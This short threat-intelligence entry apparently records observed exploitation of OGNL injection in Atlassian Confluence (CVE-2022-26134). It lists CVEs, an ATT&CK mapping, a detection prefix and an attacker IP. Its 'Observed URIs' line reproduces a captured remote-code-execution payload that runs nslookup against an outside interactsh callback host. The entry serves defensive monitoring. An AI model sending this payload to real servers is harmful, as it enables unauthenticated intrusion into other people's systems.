Confluence OGNL Expression Injection for 2026-02-18

Feb 18, 2026 WebExploit

Last Updated: 16:45 UTC

OGNL (Object-Graph Navigation Language) expression injection in Atlassian Confluence achieving unauthenticated RCE. The URL-encoded prefix %24%7B%40java.lang (${@java.lang) is the invariant for CVE-2022-26134 and related injection variants. Active exploitation includes OOB DNS callback canaries via interactsh.

CVE References

CVE-2022-26134 CVE-2023-22515

MITRE ATT&CK

Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application

Observed URIs

/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cc4690pahc7v2qo000101atzezzjz83sy.oast.online%22%...

Attackers by Country

IP Address : ASN : City/Provider

185.156.74.58 : AS210848 telkom internet ltd : Russian Federation

Share on: